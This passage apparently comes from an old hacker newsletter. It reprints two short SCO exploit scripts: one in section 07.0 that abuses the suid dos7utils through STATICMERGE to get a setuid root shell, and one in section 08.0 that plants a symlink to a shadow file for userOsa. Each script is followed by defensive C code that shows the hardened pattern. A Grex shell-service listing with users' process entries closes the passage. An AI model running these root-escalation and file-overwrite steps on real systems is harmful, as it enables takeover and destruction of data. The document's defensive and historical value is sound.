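 * as IPv4-mapped IPv6) so that both families compare uniformly.
 * The port is ignored on purpose: the data connection comes from a
 * different client port than the control connection. */
static int addr_key(const struct sockaddr *sa, unsigned char key[16])
{
    if (sa->sa_family == AF_INET) {
        const struct sockaddr_in *in4 = (const struct sockaddr_in *)sa;
        memset(key, 0, 10);
        key[10] = key[11] = 0xff;
        memcpy(key + 12, &in4->sin_addr, 4);
        return 0;
    }
    if (sa->sa_family == AF_INET6) {
        const struct sockaddr_in6 *in6 = (const struct sockaddr_in6 *)sa;
        memcpy(key, &in6->sin6_addr, 16);
        return 0;
    }
    return -1;
}

/* 1 if both addresses name the same host, 0 otherwise. */
int same_host(const struct sockaddr *a, const struct sockaddr *b)
{
    unsigned char ka[16], kb[16];

    if (addr_key(a, ka) != 0 || addr_key(b, kb) != 0)
        return 0;
    return memcmp(ka, kb, sizeof ka) == 0;
}

/* Accept on the PASV listener until the peer is the control-connection
 * host. Connections from other hosts are closed unread; the call gives
 * up once more than max_strangers of them have been turned away. */
int accept_data_from(int listen_fd, const struct sockaddr *ctrl_peer,
                     int max_strangers)
{
    int rejected = 0;

    while (rejected <= max_strangers) {
        struct sockaddr_storage peer;
        socklen_t len = sizeof peer;
        int fd = accept(listen_fd, (struct sockaddr *)&peer, &len);

        if (fd < 0)
            return -1;
        if (same_host(ctrl_peer, (const struct sockaddr *)&peer))
            return fd;
        close(fd);              /* not the logged-in client: drop it */
        rejected++;
    }
    return -1;
}

/* Helper for the demonstration: parse a textual address into a
 * sockaddr_storage. Returns 0 on success, -1 on a malformed address. */
int make_addr(const char *text, unsigned short port,
              struct sockaddr_storage *out)
{
    struct sockaddr_in *in4 = (struct sockaddr_in *)out;
    struct sockaddr_in6 *in6 = (struct sockaddr_in6 *)out;

    memset(out, 0, sizeof *out);
    if (inet_pton(AF_INET, text, &in4->sin_addr) == 1) {
        in4->sin_family = AF_INET;
        in4->sin_port = htons(port);
        return 0;
    }
    memset(out, 0, sizeof *out);
    if (inet_pton(AF_INET6, text, &in6->sin6_addr) == 1) {
        in6->sin6_family = AF_INET6;
        in6->sin6_port = htons(port);
        return 0;
    }
    return -1;
}

int main(void)
{
    struct sockaddr_storage ctrl, own, other;

    /* Constructed addresses: control peer, its own data connection,
     * and a connection attempt from an unrelated host. */
    if (make_addr("192.0.2.10", 40000, &ctrl) != 0 ||
        make_addr("192.0.2.10", 40123, &own) != 0 ||
        make_addr("198.51.100.7", 40124, &other) != 0)
        return 1;
    printf("own data connection accepted: %d\n",
           same_host((struct sockaddr *)&ctrl, (struct sockaddr *)&own));
    printf("foreign data connection accepted: %d\n",
           same_host((struct sockaddr *)&ctrl, (struct sockaddr *)&other));
    return 0;
}
```

      The address check stops a third host from claiming the port. It does not
      help when both parties share an address (NAT, a multi-user host), which
      is why choosing passive ports unpredictably is the complementary measure.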
      
      @HWA      
      
07.0  A vulnerability exists in the /usr/lib/merge/dos7utils program...
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 

      #!/bin/sh
      #
      #  A vulnerability exists in the /usr/lib/merge/dos7utils
      # program  (suid root  by default)  which allows any user
      # to execute any command as root.
      #
      #  The dos7utils program gets its localeset.sh exec path
      # from the environment variable STATICMERGE.  By setting
      # this to a directory writable by us and setting the -f
      # switch, we can have dos7utils run our program as follows:
      #
      #                                         ..Brock Tellier
      
      uname -a; id; pwd
      export STATICMERGE=/tmp
      
      cat > /tmp/localeset.sh << 'EOF'
      #!/bin/sh
      id
      chmod +s /bin/sh
      EOF
      
      chmod 700 /tmp/localeset.sh 
      ./dos7utils -f bah
      /bin/sh
      
      #                 www.hack.co.za                 #      
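
      Added example (not part of the original post and not SCO's code): the
      trust decision described in the script's comment, shown as the pattern
      that takes the helper directory from the environment next to a hardened
      resolver for a set-uid program. Function names are hypothetical, and
      /usr/lib/merge as the default helper directory is an assumption based on
      the dos7utils path given above.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#define HELPER_NAME "localeset.sh"
#define DEFAULT_DIR "/usr/lib/merge"   /* assumption, see lead-in */

static int join_path(const char *dir, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "%s/%s", dir, HELPER_NAME);
    return (n > 0 && (size_t)n < outlen) ? 0 : -1;
}

/* Pattern from the advisory: whoever sets the variable picks the
 * directory the privileged program executes its helper from. */
int helper_path_unsafe(const char *env_dir, char *out, size_t outlen)
{
    return join_path((env_dir && *env_dir) ? env_dir : DEFAULT_DIR,
                     out, outlen);
}

/* True when the process runs with more privilege than its invoker,
 * which is the case for a set-uid or set-gid binary. */
int running_privileged(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Hardened resolver: a privileged process ignores the environment and
 * uses the compiled-in directory; an ordinary process may override it. */
int helper_path_safe(const char *env_dir, int privileged,
                     char *out, size_t outlen)
{
    if (privileged || env_dir == NULL || *env_dir == '\0')
        return join_path(DEFAULT_DIR, out, outlen);
    return join_path(env_dir, out, outlen);
}

static int mode_ok(const struct stat *st, uid_t owner)
{
    return st->st_uid == owner &&
           (st->st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Last check before exec: the helper must be a regular file (not a
 * symlink) at an absolute path, and both it and its directory must be
 * owned by `owner` and not writable by group or others. Only the
 * immediate parent directory is examined here. */
int helper_is_trusted(const char *path, uid_t owner)
{
    char dir[512];
    struct stat st;
    char *slash;
    size_t len = strlen(path);

    if (path[0] != '/' || len >= sizeof dir)
        return 0;
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode) || !mode_ok(&st, owner))
        return 0;
    memcpy(dir, path, len + 1);
    slash = strrchr(dir, '/');
    if (slash == dir)
        slash[1] = '\0';        /* helper sits directly under "/" */
    else
        *slash = '\0';
    if (lstat(dir, &st) != 0 || !S_ISDIR(st.st_mode) || !mode_ok(&st, owner))
        return 0;
    return 1;
}

int main(void)
{
    char path[512];

    if (helper_path_safe(getenv("STATICMERGE"), running_privileged(),
                         path, sizeof path) != 0)
        return 1;
    printf("helper: %s (root-owned and not writable by others: %s)\n",
           path, helper_is_trusted(path, 0) ? "yes" : "no");
    return 0;
}
```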
      
      @HWA
      
08.0  SCO OpenServer symlink vulnerability (Brock Tellier)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From http://www.hack.co.za/ 

      #!/bin/sh
      #
      # Under certain versions of SCO OpenServer there exists a
      # symlink vulnerability which can be exploited to overwrite
      # any file which is group writable by the 'auth' group.
      #
      # The problem in particular is in the
      # /etc/sysadm.d/bin/userOsa executable. When given garbage
      # output the program will write out a debug log. However,
      # the program does not check to see if it is overwriting a
      # currently existing file nor whether it is following a
      # symlink. Therefore it is possible to overwrite files with
      # debug data which are both in the 'auth' group and are
      # writable by the same group. Both /etc/shadow & /etc/passwd
      # fall into this category. If such an attack were launched
      # against these files the system would be rendered unusable.
      #
      #                                         ..Brock Tellier
      #
      #    vulnerable: SCO Open Server 5.0 -> 5.0.5
      #
      # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
      
      cd /tmp
      ln -s /etc/shadow.old debug.log
      /etc/sysadm.d/bin/userOsa
      
      #                     www.hack.co.za                     #
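
      Added example (not part of the original post and not SCO's code): the
      two ways of opening a debug log that the comment above contrasts, run
      against a scratch directory in which debug.log is a symlink to a
      stand-in file. Function names, the scratch paths and the file contents
      are constructed for illustration.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

static const char VICTIM_DATA[] = "constructed stand-in for a protected file\n";
static const char DEBUG_DATA[]  = "debug: constructed log line\n";

/* The behaviour the advisory describes: the log is opened by name with
 * truncation, so an existing file or a planted symlink is overwritten. */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened form: the log must be a file that this very call creates.
 * O_EXCL fails if the name already exists, symlinks included;
 * O_NOFOLLOW refuses a symlink as the last path component;
 * fstat confirms a regular file with a single link. */
int open_log_safe(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);

    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

static int write_all(int fd, const char *s)
{
    size_t n = strlen(s);
    return write(fd, s, n) == (ssize_t)n ? 0 : -1;
}

/* Build the scratch scenario, run the chosen opener on the symlinked
 * log name, and return the stand-in file's size afterwards (-1 on a
 * setup error). All files are removed again before returning. */
long victim_size_after(int use_safe)
{
    char dir[] = "/tmp/symlink-demo-XXXXXX";
    char victim[64], log_path[64];
    struct stat st;
    long result = -1;
    int fd;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(log_path, sizeof log_path, "%s/debug.log", dir);

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0) {
        int ok = write_all(fd, VICTIM_DATA) == 0;

        close(fd);
        if (ok && symlink(victim, log_path) == 0) {
            fd = use_safe ? open_log_safe(log_path)
                          : open_log_unsafe(log_path);
            if (fd >= 0) {
                (void)write_all(fd, DEBUG_DATA);
                close(fd);
            }
            if (stat(victim, &st) == 0)
                result = (long)st.st_size;
        }
    }
    unlink(log_path);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("stand-in file holds %zu bytes before the log is opened\n",
           strlen(VICTIM_DATA));
    printf("after unsafe open: %ld bytes\n", victim_size_after(0));
    printf("after safe open:   %ld bytes\n", victim_size_after(1));
    return 0;
}
```

      A privileged program is better served by keeping such logs in a
      directory that only it can write to; the open flags then act as a
      backstop.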
      
      @HWA
      
09.0  GREX  cyberspace.org - Free shell access
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Free (restricted) shell access: no telnet/ftp unless you contribute. The
      system is set up much like a BBS, but you do get a shell. Telnet to
      cyberspace.org.
      
      And you get this; here's a brief look at the system:
      
       
      Grex central timekeeping.  At the beep, the time is
       6:20PM on Tuesday, 19 October 1999
       
      New to grex?  Type help at the login prompt
       
      (ttys3) grex login: ccc
      ccc's Password:
      Thanks to the Ann Arbor Observer for the long-running Grex ad on arborweb.com.
       
            Happy Birthday to Jishnu Nair (atticus's baby)!
       
      Last login: Tue Oct 19 18:13:31 on ttyu8 from 24.x.x.x
      No mail.
      Type 'bbs' to see what Grex is all about!
      Type 'change' to change your settings.
      Type 'faq' to see answers to frequently asked questions.
      > ls -laFF
      total 10
      drwxr-xr-x   2 ccc      populus       512 Oct 19 18:14 ./
      drwxr-xr-x  16 root     wheel         512 Oct 19 18:13 ../
      -rw-r--r--   1 ccc      populus      1159 Oct 19 18:15 .agora31.cf
      -rw-r--r--   1 ccc      populus       778 Oct 19 18:13 .cfonce
      -rw-r--r--   1 ccc      populus       664 Oct 19 18:13 .cshrc
      -rw-r--r--   1 ccc      populus       718 Oct 19 18:13 .login
      -rw-r--r--   1 ccc      populus      1245 Oct 19 18:13 .mailrc
      -rw-------   1 ccc      populus       360 Oct 19 18:13 .plan
      > ps -aux
      USER       PID %CPU %MEM   SZ  RSS TT STAT START  TIME COMMAND
      ccc      13349 76.8  0.2  296  528 s3 R    18:21   0:03 ps -aux
      mikeaa   13347 30.8  0.1   36  264 t1 S    18:21   0:00 /usr/local/lib/gcc-lib/s
      root     13353 24.3  0.2  288  460 ?  S    18:21   0:00 sendmail: SAA13353 major
      mikeaa   13341  8.7  0.1   44  252 t1 S    18:21   0:00 /usr/local/bin/gcc.real
      root       152  8.3  0.0   12    8 ?  S    Oct 10521:55 update
      root     13352  3.9  0.1  120  264 t7 S    18:21   0:00 login -h 208.135.167.19
      root      7712  0.6  0.0   56   60 ?  S    17:39   0:05 telnetd ttyq3 207.91.203
      ccc      13228  0.5  0.3  264  732 s3 S    18:20   0:02 -tcsh (tcsh)
      root     13148  0.4  0.2   56  440 ?  S    18:20   0:02 telnetd ttyt7 208.135.16
      root        91  0.0  0.1   60  168 ?  S    Oct 10174:57 syslogd
      root        98  0.0  0.0  240   88 ?  S    Oct 10 32:13 sendmail: accepting conn
      root       112  0.0  0.0  136    0 ?  IW<  Oct 10 46:40 /usr/local/sbin/robocop
      root       102  0.0  0.0   60    0 ?  IW   Oct 10  0:01 rpc.statd
      daemon      62  0.0  0.0   56  112 ?  S    Oct 10 17:50 /usr/local/libexec/portm
      root     11493  0.0  0.0   56    0 ?  IW   18:10   0:02 telnetd ttyua 139.92.170
      root     10374  0.0  0.0   56   60 ?  S    18:02   0:19 telnetd ttyu1 204.212.46
      root       111  0.0  0.0  100    0 ?  IW   Oct 10103:12 /usr/local/sbin/idled
      root       113  0.0  0.0   24    0 ?  IW   Oct 10  0:00 /bin/sh /usr/local/Hughe
      root       105  0.0  0.2  140  448 ?  S    Oct 10 13:12 /usr/local/libexec/httpd
      hrcfan   11774  0.0  0.0  264    0 t2 IW   12:03   0:02 -tcsh (tcsh)
      root     13257  0.0  0.2  316  560 ?  S    18:20   0:00 sendmail: SAA13245 tilma
      root      1439  0.0  0.0   40    0 co IW   Oct 14  0:00 - std.9600 console (gett
      root     12376  0.0  0.2   56  436 ?  S    18:16   0:08 telnetd ttyr0 204.212.46
      cfadm    11371  0.0  0.0   96    0 q8 IW   18:09   0:02 /usr/local/bin/bbs
      msql       127  0.0  0.0  140    0 ?  IW   Oct 10276:15 /usr/local/Hughes/bin/ms
      root      3932  0.0  0.0   56    0 ?  IW   17:12   0:07 telnetd ttyr9 148.233.86
      janko     6567  0.0  0.2  144  504 r1 S    17:31   0:03 -bash (bash)
      root     12330  0.0  0.0  252    0 ?  IW   18:16   0:00 sendmail: server webpers
      root        84  0.0  5.01223212424 ?  S    Oct 10251:18 /usr/local/libexec/named
      richard  10202  0.0  0.0   36   56 pe S    18:01   0:00 watch ...
      root        71  0.0  0.0   36   52 ?  S    Oct 10  4:22 in.routed
      msql       126  0.0  0.0   52    0 ?  IW   Oct 10  0:00 /bin/csh -c /usr/local/H
      cfadm     2686  0.0  0.0  128    0 pe IW   17:02   0:06 /usr/local/bin/bbs
      root     11820  0.0  0.0  240    0 ?  IW   18:12   0:05 /usr/local/libexec/sshd
      ryan     12429  0.0  0.0  160    0 q5 IW   18:16   0:00 tcsh -c /a/r/y/ryan/pfil
      thea     10449  0.0  0.1 1264  300 u1 S    18:02   0:18 pine
      root       164  0.0  0.1   52  168 ?  S    Oct 10  8:06 cron
      root       219  0.0  0.0   40    0 b  IW   Oct 10  0:00 - std.9600 ttyb (getty)
      suchit     360  0.0  0.0  152    0 pa IW   16:43   0:07 -bash (bash)
      fb2      13125  0.0  0.0   36    0 ua IW   18:20   0:00 /bin/sh /b
      root     29495  0.0  0.0   40    0 ?  IW   06:01   0:00 in.ntalkd
      nobody   10684  0.0  0.3  216  628 ?  S    18:04   0:09 /usr/local/libexec/httpd
      root         2  0.0  0.0    0    0 ?  D    Oct 10  1:06 pagedaemon
      root     12583  0.0  0.2  328  524 ?  S    18:17   0:02 sendmail: RAA04763 serve
      mystar   28951  0.0  0.0   68    0 tf IW   16:31   0:02 -csh (csh)
      joe      13260  0.0  0.1   48  128 t8 S    18:20   0:00 /bin/sh /usr/local/bin/m
      root         1  0.0  0.0   52   20 ?  S    Oct 10  5:23 /sbin/init -
      root     11752  0.0  0.0   56    0 ?  IW   12:03   0:17 telnetd ttyt2 130.126.16
      mbollman 11691  0.0  0.0   72    0 p7 IW   18:12   0:01 -ksh (ksh)
      skymoon  10789  0.0  0.0   68    0 s8 IW   18:04   0:02 -csh (csh)
      root      2089  0.0  0.0   56    0 ?  IW   16:59   0:34 telnetd ttyu9 164.76.51.
      metgod   11225  0.0  0.0   68    0 t9 IW   18:07   0:01 ksh
      mikeaa   13340  0.0  0.0   72  112 t1 S    18:21   0:00 /bin/sh ./configure
      ya       10199  0.0  0.0   68    0 tc IW   18:01   0:02 -csh (csh)
      hrcfan   11415  0.0  0.0  184    0 t2 IW   18:09   0:01 elm
      root     10939  0.0  0.0   56   56 ?  S    18:05   0:09 telnetd ttyqd 198.182.64
      party    11972  0.0  0.1   72  328 t3 S    18:14   0:02 /usr/local/bin/party_
      root     28089  0.0  0.0   56    0 ?  IW   16:25   0:03 telnetd ttyte gate1.lci.
      jiffer   26209  0.0  0.0  264    0 r3 IW   16:12   0:02 -tcsh (tcsh)
      jackal   10326  0.0  0.0   48    0 rc TW   18:01   0:00 /bin/sh /usr/local/bin/m
      root     13199  0.0  0.2   56  436 ?  S    18:20   0:01 telnetd ttyt8 152.207.13
      root     28934  0.0  0.0   56   60 ?  S    16:31   0:13 telnetd ttytf 207.220.20
      meme      9643  0.0  0.0   68    0 tb IW   17:56   0:01 -csh (csh)
      nats      7089  0.0  0.0  172    0 q7 IW   17:35   0:01 elm
      root     10914  0.0  0.0   56   60 ?  S    18:05   0:06 telnetd ttypc 207.91.203
      root     13344  0.0  0.1  252  280 ?  S    18:21   0:00 sendmail: server tfabbs.
      root     11314  0.0  0.0   56    0 ?  IW   18:08   0:02 telnetd ttys4 24.48.58.2
      jackal   12828  0.0  0.0   36    0 rc TW   18:18   0:00 more -d
      root     10542  0.0  0.0   56    0 ?  IW   18:03   0:03 telnetd ttyq2 204.212.46
      root      7495  0.0  0.0   24    0 ?  IW   Oct 11  1:14 ./mdaemon -d
      root     11216  0.0  0.0   56    0 ?  IW   18:07   0:01 telnetd ttyt9 216.101.22
      archer    4089  0.0  0.0   48    0 r9 IW   17:13   0:00 /bin/sh /usr/local/bin/m
      root     11466  0.0  0.0   96    0 ?  IW   Oct 16  0:01 egrep USER|STOR|RETR|LIS
      root     22696  0.0  0.0   56    0 ?  IW   Oct 14  1:35 telnetd ttyu5 141.211.16
      root     11113  0.0  0.0   56    0 ?  IW   18:06   0:02 telnetd ttys0 198.108.22
      root     12296  0.0  0.0   56   60 ?  S    18:16   0:02 telnetd ttyq5 4.17.192.3
      robnoiz  11194  0.0  0.0  316    0 s0 IW   18:07   0:01 pine
      sekharg  10067  0.0  0.0   68    0 qb IW   17:59   0:01 -csh (csh)
      pfv      10343  0.0  0.0   36   56 u2 S    18:01   0:00 watch ...
      prime    11619  0.0  0.0   56    0 pc IW   18:11   0:01 -csh (csh)
      jazz       131  0.0  0.0  232    0 r2 IW   16:40   0:01 -tcsh (tcsh)
      pizo56   13130  0.0  0.2  800  516 ?  S    18:20   0:02 ftpd: quincy-ip-15-99.dy
      root      9885  0.0  0.0   56   60 ?  S    17:58   0:06 telnetd ttysa 198.182.64
      root     13275  0.0  0.2  300  388 ?  I    18:20   0:00 sendmail: SAA13263 f298.
      bebbe346 10528  0.0  0.0   48    0 t4 TW   18:02   0:00 mail pine
      nobody   11637  0.0  0.3  216  644 ?  S    18:11   0:04 /usr/local/libexec/httpd
      party     8477  0.0  0.1   72  328 t5 S    17:45   0:04 /usr/local/bin/party_
      root     11465  0.0  0.1   36  140 ?  S    Oct 16 14:41 tail -f /var/log/ftp.log
      wild     10942  0.0  0.0   40    0 qd IW   18:05   0:00 /bin/sh /b
      coop     16853  0.0  0.0  156    0 p4 IW   Oct 17  0:01 -bash (bash)
      saloon   10241  0.0  0.0  148    0 u0 IW   18:01   0:06 -bash (bash)
      root      2308  0.0  0.0   56    0 ?  IW   Oct 18  0:03 telnetd ttyp6 206.189.24
      root     14496  0.0  0.1   28  180 ?  S    12:25   0:12 in.comsat
      root     11920  0.0  0.0   56   60 ?  S    18:13   0:05 telnetd ttyt3 204.212.46
      root      9629  0.0  0.0   56   60 ?  S    17:55   0:16 telnetd ttytb 171.64.15.
      senna    29517  0.0  0.0   36    0 ue IW   16:36   0:02 watch ...
      root      6538  0.0  0.0   56   60 ?  S    17:31   0:07 telnetd ttyr1 158.193.82
      cfadm    11132  0.0  0.0   96    0 s0 IW   18:07   0:01 /usr/local/bin/bbs
      cfadm    11978  0.0  0.0  128    0 u5 IW   Oct 17  0:51 bbs staff
      wild     10963  0.0  0.0   48    0 qd IW   18:06   0:00 /bin/sh /usr/local/bin/m
      jackal   13021  0.0  0.0   40    0 rc IW   18:19   0:00 /bin/sh /usr/local/lib/m
      wasf     12094  0.0  0.0   68    0 q6 IW   18:15   0:01 -csh (csh)
      archer    3951  0.0  0.0   68    0 r9 IW   17:12   0:01 -csh (csh)
      root     12506  0.0  0.0   56    0 ?  IW   18:17   0:02 telnetd ttyu8 198.133.22
      jackal   13077  0.0  0.1   36  200 rc S    18:19   0:01 more -d
      root     10170  0.0  0.0   56    0 ?  IW   18:00   0:04 telnetd ttytc 163.121.88
      meme      9670  0.0  0.2  680  388 tb S    17:56   0:13 pine
      senna    29426  0.0  0.0   68    0 ue IW   16:35   0:01 -csh (csh)
      pfv      10305  0.0  0.0  260    0 u2 IW   18:01   0:02 -tcsh (tcsh)
      somesh   11383  0.0  0.0  380    0 s4 IW   18:09   0:01 lynx -cookies quote.yaho
      root     11906  0.0  0.0   56    0 ?  IW   18:13   0:05 telnetd ttysb 63.23.174.
      somesh   11322  0.0  0.0  264    0 s4 IW   18:08   0:01 -tcsh (tcsh)
      nobody   11899  0.0  0.3  216  664 ?  S    18:13   0:01 /usr/local/libexec/httpd
      root     29405  0.0  0.0   56   60 ?  S    16:35   0:06 telnetd ttyue 3com1a94.r
      krj      25504  0.0  0.0   56    0 q1 IW   16:09   0:01 -csh (csh)
      jackal   12792  0.0  0.0   40    0 rc TW   18:18   0:00 /bin/sh /usr/local/lib/m
      roelof   11869  0.0  0.0  264    0 p5 IW   18:13   0:03 -tcsh (tcsh)
      jackal   12830  0.0  0.0 1104    0 rc TW   18:18   0:00 sort
      root      8362  0.0  0.0   56   56 ?  S    17:44   0:04 telnetd ttyt5 202.56.224
      root     10766  0.0  0.0   56    0 ?  IW   18:04   0:04 telnetd ttys8 196.3.65.9
      nes16    10550  0.0  0.0   68    0 q2 IW   18:03   0:00 -csh (csh)
      root      7216  0.0  0.0   36  100 ?  S    20:57   3:02 tail -f /var/log/ftp.log
      root     12079  0.0  0.0   56   60 ?  S    18:14   0:03 telnetd ttyq6 front0.cpl
      tlaff    11081  0.0  0.0   40    0 td IW   18:06   0:00 /bin/sh /usr/local/lib/m
      nobody   10600  0.0  0.3  216  696 ?  S    18:03   0:05 /usr/local/libexec/httpd
      tlaff    11061  0.0  0.0   48    0 td IW   18:06   0:00 /bin/sh /usr/local/bin/m
      nobody    8285  0.0  0.0   32    0 ?  IW   Oct 11  0:01 fingerd
      root     25480  0.0  0.0   56   56 ?  S    16:08   0:46 telnetd ttyq1 35.8.1.4
      root     11004  0.0  0.0   56    0 ?  IW   18:06   0:03 telnetd ttys9 200.16.7.1
      nobody   11876  0.0  0.3  216  724 ?  S    18:13   0:05 /usr/local/libexec/httpd
      nes16    10580  0.0  0.0   48    0 q2 IW   18:03   0:00 /bin/sh /usr/local/bin/m
      abbagirl  2229  0.0  0.0   36    0 u9 IW   17:00   0:01 watch ...
      cfadm     3791  0.0  0.0  128    0 q1 IW   17:11   0:09 bbs
      jackal   13078  0.0  0.1   40  212 rc S    18:19   0:01 last
      archer    4105  0.0  0.0 1180    0 r9 IW   17:13   0:14 pine
      mauricio 11043  0.0  0.0   68    0 s9 IW   18:06   0:02 -csh (csh)
      root     10237  0.0  0.0   56   60 ?  S    18:01   0:11 telnetd ttyu0 137.224.19
      ryan     12439  0.0  0.1   44  268 q5 S    18:16   0:02 /a/r/y/ryan/pfilt/filter
      thea     10395  0.0  0.0   68    0 u1 IW   18:02   0:01 -csh (csh)
      mbollman 12350  0.0  0.0   28    0 p7 IW   18:16   0:00 /bin/sh /usr/local/bin/h
      mbollman 12551  0.0  0.0   40    0 p7 IW   18:17   0:00 more -d /usr/local/grexd
      root     26165  0.0  0.0   56   60 ?  S    16:12   0:18 telnetd ttyr3 165.215.30
      jackal   10254  0.0  0.0   68    0 rc IW   18:01   0:01 -csh (csh)
      joe      13308  0.0  0.5  252 1188 t8 S    18:20   0:00 pine
      jiffer   26334  0.0  0.0   36    0 r3 IW   16:13   0:02 watch ...
      root     10244  0.0  0.0   56   60 ?  S    18:01   0:10 telnetd ttyrc 206.10.105
      shrike   28123  0.0  0.0  272    0 te IW   16:25   0:02 -tcsh (tcsh)
      jopap     9888  0.0  0.0   68    0 sa IW   17:58   0:02 -csh (csh)
      menuadm  11948  0.0  0.0   60   88 u0 S    18:13   0:03 talk prime
      keesan   12650  0.0  0.0   68    0 qe IW   18:17   0:02 -csh (csh)
      krj      25547  0.0  0.0   36    0 q1 IW   16:09   0:02 watch ...
      root      3679  0.0  0.0  144    0 ?  IW   Oct 14 37:59 /usr/local/libexec/sshd
      greg99   12558  0.0  0.0  156    0 u8 IW   18:17   0:02 -bash (bash)
      jackal   12829  0.0  0.0  328    0 rc TW   18:18   0:30 ps -aux
      party    29735  0.0  0.0   80  104 ue S    16:38   0:07 /usr/local/bin/party_
      tadeu    16231  0.0  0.0  796    0 ?  IW   12:39   0:01 ftpd: 200.249.132.149: t
      root     13305  0.0  0.1  252  208 ?  S    18:20   0:00 sendmail: startup with l
      root      8487  0.0  0.0   56    0 ?  IW   17:45   0:04 telnetd ttyt4 202.60.130
      jackal   12987  0.0  0.0   48    0 rc IW   18:19   0:00 /bin/sh /usr/local/bin/m
      cfadm    12155  0.0  0.0   96    0 qd IW   18:15   0:01 bbs
      party    11136  0.0  0.1   72  140 td S    18:07   0:02 /usr/local/bin/party_
      rjh123   11441  0.0  0.0  428  124 q8 IW   18:09   0:07 pine
      root     10897  0.0  0.0   56   56 ?  S    18:05   0:08 telnetd ttyt1 209.138.42
      root      2642  0.0  0.0   56   56 ?  S    17:02   0:17 telnetd ttype 161.233.38
      vetri     7729  0.0  0.1   80  160 q3 S    17:39   0:03 -csh (csh)
      party    10050  0.0  0.0   60  104 pe S    17:59   0:04 /usr/local/bin/party_
      mikeaa   12286  0.0  0.1   72  156 t1 S    18:16   0:07 /bin/sh ./configure
      shooter   4464  0.0  0.0  800    0 ?  IW   14:53   0:03 ftpd: 212.49.231.161: sh
      mooncat  11921  0.0  0.0   68    0 t3 IW   18:13   0:01 -csh (csh)
      cfadm    11016  0.0  0.0   96    0 td IW   18:06   0:01 /usr/local/bin/bbs
      pfv      10369  0.0  0.1   52  200 u2 S    18:02   0:07 /a/p/f/pfv/bin/pfilt
      root     16844  0.0  0.0  496    0 ?  IW   Oct 17  1:23 /usr/local/libexec/sshd
      mdw      22714  0.0  0.0   76    0 u5 IW   Oct 14  0:06 -csh (csh)
      bebbe346  8506  0.0  0.0   68    0 t4 IW   17:45   0:01 -csh (csh)
      pinhead  12766  0.0  0.0  796    0 ?  IW   18:18   0:02 ftpd: a03169.sp.mandic.c
      root     29798  0.0  0.0   40    0 ?  IW   06:03   0:00 in.ntalkd
      shrike    2942  0.0  0.0  224    0 te IW   17:05   0:03 elm
      somesh   11379  0.0  0.0   28    0 s4 IW   18:09   0:00 /bin/sh ./q
      party     7116  0.0  0.1   60  320 q1 S    17:35   0:07 /usr/local/bin/party_
      root     12718  0.0  0.0   56    0 ?  IW   12:08   0:35 telnetd ttyq7 edsel.smud
      root     15158  0.0  0.0   56    0 ?  IW   12:30   0:43 telnetd ttyq0 inet.bdsi.
      root     11000  0.0  0.2   56  436 ?  S    18:06   0:05 telnetd ttytd 128.196.22
      thea     10435  0.0  0.0   48    0 u1 IW   18:02   0:00 /bin/sh /usr/local/bin/m
      root       134  0.0  0.0   56    0 ?  IW   16:40   0:49 telnetd ttypa 129.115.11
      sys      10314  0.0  0.0   36   44 ?  I    11:54   0:09 in.identd -w -t300 -l
      ryan     12424  0.0  0.1   36  152 q5 S    18:16   0:00 /a/r/y/ryan/watch ...
      root      2470  0.0  0.0   68    0 u5 TW   Oct 17  0:02 -sh (csh)
      sys      26321  0.0  0.0   48    0 ?  IW   Oct 11  0:00 in.identd -w -t300 -l
      mikeaa   10916  0.0  0.0  156    0 t1 IW   18:05   0:03 -bash (bash)
      root     26487  0.0  0.0   56   60 ?  S    19:26   1:47 inetd
      neya     15160  0.0  0.0   72    0 q0 IW   12:30   0:06 -csh (csh)
      root       120  0.0  0.0   56   56 ?  R    16:40  40:18 telnetd ttyr2 147.225.19
      krj      25545  0.0  0.0   36    0 q1 IW   16:09   0:03 watch ...
      root     13219  0.0  0.2   56  432 ?  S    18:20   0:01 telnetd ttys3 24.112.155
      sj2       8398  0.0  0.0  144    0 t5 IW   17:45   0:01 -bash (bash)
      keesan   12720  0.0  0.0   48   60 qe S    18:18   0:00 mail wlevak
      nes16    10616  0.0  0.0  448    0 q2 IW   18:03   0:02 pine
      root     10058  0.0  0.0   56    0 ?  IW   17:59   0:02 telnetd ttyqb 24.30.48.8
      nats     12725  0.0  0.0   68    0 q7 IW   12:08   0:05 -csh (csh)
      abbagirl  2171  0.0  0.0   64    0 u9 IW   16:59   0:02 -csh (csh)
      party    26762  0.0  0.1   80  208 r3 S    16:16   0:11 /usr/local/bin/party_
      party    12225  0.0  0.1   72  180 qd S    18:15   0:01 /usr/local/bin/party_
      root     10287  0.0  0.0   56   60 ?  S    18:01   0:10 telnetd ttyu2 216.93.16.
      ryan     12318  0.0  0.0   68    0 q5 IW   18:16   0:01 -csh (csh)
      root     12644  0.0  0.0   56   60 ?  S    18:17   0:07 telnetd ttyqe 204.212.46
